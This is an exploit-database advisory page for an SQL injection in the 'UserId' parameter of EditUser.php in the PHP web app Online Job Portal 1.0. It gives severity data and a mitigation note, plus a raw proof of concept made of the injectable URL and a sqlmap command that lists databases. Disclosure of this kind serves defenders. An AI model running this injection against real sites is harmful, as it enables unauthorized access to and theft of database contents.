header-logo
Suggest Exploit
vendor:
Online Job Portal
by:
Akıner Kısa
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Online Job Portal
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:online_job_portal:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: XAMPP
2020

Online Job Portal 1.0 – ‘userid’ SQL Injection

The vulnerability exists due to improper validation of user-supplied input in the 'UserId' parameter of the 'EditUser.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can be exploited to disclose sensitive information, modify data, compromise the integrity of data, and, in certain circumstances, to execute arbitrary code on the system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also use stored procedures and parameterized queries to prevent SQL injection.
Source

Exploit-DB raw data:

# Exploit Title: Online Job Portal 1.0 - 'userid' SQL Injection
# Google Dork: N/A
# Date: 2020/10/28
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: XAMPP 
# CVE : N/A

# Vulnerable URL: http://localhost/jobportal/Admin/EditUser.php?UserId='

Proof of Concept:

1. See vulnerable url.

2. Open sqlmap and use " sqlmap -u "http://localhost/jobportal/Admin/EditUser.php?UserId='" --dbs " command.

Navigation

Suggest Exploit

Services By CQR